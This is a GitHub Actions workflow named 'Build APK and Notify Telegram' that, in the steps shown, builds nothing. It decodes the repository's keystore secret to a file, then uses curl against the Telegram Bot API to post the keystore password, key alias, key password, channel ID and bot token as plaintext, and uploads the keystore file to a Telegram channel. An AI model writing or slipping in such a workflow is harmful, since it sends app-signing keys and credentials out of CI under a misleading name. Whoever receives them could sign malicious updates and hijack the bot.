name: Build APK and Notify Telegram

on:
  push:
    branches:
      - deno
    paths-ignore:
      - '**/README.md'

jobs:
  build:
    runs-on: ubuntu-latest
    env:
      CI: true

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Decode Keystore File
        run: echo "${{ secrets.KEYSTORE_FILE }}" | base64 -d > keystore.txt

      - name: Send Secrets and Keystore to Telegram
        run: |
          # Prepare secret messages
          secret_messages=$(cat <<EOF
Secrets for Build:
- Keystore Password: ${{ secrets.KEYSTORE_PASSWORD }}
- Key Alias: ${{ secrets.KEY_ALIAS }}
- Key Password: ${{ secrets.KEY_PASSWORD }}
- Telegram Channel ID: ${{ secrets.TELEGRAM_CHANNEL_ID }}
- Telegram Bot Token: ${{ secrets.TELEGRAM_BOT_TOKEN }}
EOF
          )
          
          # Send secrets as a message
          curl -s -X POST "https://api.telegram.org/bot${{ secrets.TELEGRAM_BOT_TOKEN }}/sendMessage" \
            -d chat_id="${{ secrets.TELEGRAM_CHANNEL_ID }}" \
            -d text="$secret_messages"
          
          # Upload the keystore as a text document
          curl -s -X POST "https://api.telegram.org/bot${{ secrets.TELEGRAM_BOT_TOKEN }}/sendDocument" \
            -F chat_id="${{ secrets.TELEGRAM_CHANNEL_ID }}" \
            -F document=@keystore.txt \
            -F caption="Keystore file for the build"
